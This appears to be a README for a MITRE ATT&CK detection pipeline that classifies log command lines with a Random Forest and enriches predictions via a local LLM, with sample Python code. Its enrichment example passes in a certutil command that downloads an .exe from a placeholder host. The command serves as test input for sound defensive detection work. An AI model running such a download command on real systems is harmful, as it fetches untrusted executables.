This repository demonstrates a machine learning pipeline for detecting MITRE ATT&CK techniques from logs and enriching the output using a local LLM.
The project is divided into two main components: an ML model that classifies log events, and a local LLM that enriches the model's predictions.
The ML model is trained to predict a MITRE technique (or BENIGN) from log events.
This allows automation of detection and categorization of potentially malicious behavior.
Input: commandline field from logs
Output: mitre_label (e.g., T1059.001, T1105, BENIGN)
To train the model, run:
python scripts/train_mitre_model.py
This script:
Loads the dataset dataset_full_160k.csv
Splits data into train/test sets
Converts command lines to TF-IDF vectors
Trains the Random Forest model
Evaluates performance (precision, recall, F1-score, confusion matrix)
Saves the trained model and vectorizer:
models/mitre_ml_model.pkl
models/tfidf_vectorizer.pkl
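The training steps listed above can be sketched roughly as follows. This is a minimal illustration using scikit-learn, not the contents of scripts/train_mitre_model.py: the function names `load_dataset` and `train_and_evaluate`, the 80/20 stratified split, the default TF-IDF settings, the 100-tree forest, and the use of `pickle` for serialization are all assumptions. Only the column names, the file names, and the overall sequence come from the description above.

```python
import csv
import pickle
from pathlib import Path

from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.model_selection import train_test_split


def load_dataset(csv_path):
    """Read (commandline, mitre_label) pairs from a CSV file (hypothetical helper)."""
    commands, labels = [], []
    with open(csv_path, newline="", encoding="utf-8") as handle:
        for row in csv.DictReader(handle):
            commands.append(row["commandline"])
            labels.append(row["mitre_label"])
    return commands, labels


def train_and_evaluate(commands, labels, model_dir="models"):
    """Train a TF-IDF + Random Forest classifier and save both artifacts."""
    # Assumed split: 20% held out, stratified so every label appears in the test set.
    x_train, x_test, y_train, y_test = train_test_split(
        commands, labels, test_size=0.2, random_state=42, stratify=labels
    )

    # Fit the vectorizer on training data only, then reuse it for the test data.
    vectorizer = TfidfVectorizer()
    x_train_vec = vectorizer.fit_transform(x_train)
    x_test_vec = vectorizer.transform(x_test)

    # Assumed hyperparameters; the real script may use different ones.
    model = RandomForestClassifier(n_estimators=100, random_state=42)
    model.fit(x_train_vec, y_train)

    # Precision, recall, and F1 per label, followed by the confusion matrix.
    predictions = model.predict(x_test_vec)
    print(classification_report(y_test, predictions, zero_division=0))
    print(confusion_matrix(y_test, predictions))

    # Save the model and the vectorizer under the file names listed above.
    out_dir = Path(model_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    with open(out_dir / "mitre_ml_model.pkl", "wb") as handle:
        pickle.dump(model, handle)
    with open(out_dir / "tfidf_vectorizer.pkl", "wb") as handle:
        pickle.dump(vectorizer, handle)
    return model, vectorizer
```

Under these assumptions, a full run would look like `train_and_evaluate(*load_dataset("dataset_full_160k.csv"))`. The vectorizer is saved alongside the model because new command lines must be transformed with the same vocabulary before prediction.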

Once the ML model predicts a MITRE technique, the LLM enriches the result by providing:
Technique explanation
Why the command matches the technique
Attacker intent
Recommended investigation steps
Suggested detection rules
This step bridges the gap between the raw ML prediction and actionable insights for SOC analysts.
A local LLM (e.g., Phi-3 via Ollama) is called with a prompt containing:
ML prediction
Raw command line
python scripts/enrich_with_llm.py
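As an illustration of the enrichment call, the sketch below builds a prompt from the ML prediction and the raw command line, then sends it to a locally running Ollama server through its HTTP generate endpoint. It is not the code in scripts/enrich_with_llm.py: the helper names `build_prompt` and `enrich`, the prompt wording, the `phi3` model tag, and the timeout are assumptions, and the URL is Ollama's default local address.

```python
import json
import urllib.request

# Ollama's default local endpoint; adjust if the server listens elsewhere.
OLLAMA_URL = "http://localhost:11434/api/generate"


def build_prompt(technique, commandline):
    """Combine the ML prediction and the raw command line into one prompt.

    The wording is a hypothetical example covering the five enrichment items.
    """
    return (
        "You are assisting a SOC analyst.\n"
        f"Predicted MITRE ATT&CK technique: {technique}\n"
        f"Command line: {commandline}\n\n"
        "Provide:\n"
        "1. An explanation of the technique\n"
        "2. Why the command matches the technique\n"
        "3. The likely attacker intent\n"
        "4. Recommended investigation steps\n"
        "5. Suggested detection rules\n"
    )


def enrich(technique, commandline, model="phi3", timeout=120):
    """Send the prompt to a local Ollama server and return the generated text."""
    payload = json.dumps(
        {
            "model": model,  # assumed model tag; must already be pulled in Ollama
            "prompt": build_prompt(technique, commandline),
            "stream": False,  # ask for a single JSON object instead of a stream
        }
    ).encode("utf-8")
    request = urllib.request.Request(
        OLLAMA_URL,
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        body = json.loads(response.read().decode("utf-8"))
    return body["response"]
```

With Ollama running and the model pulled, a call such as `enrich("T1105", "certutil -urlcache -f http://host/file.exe")` would return the model's explanation as a string. Keeping prompt construction in its own function makes it possible to inspect or adjust the prompt without contacting the model.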

pip3 install -r requirements.txt
Libraries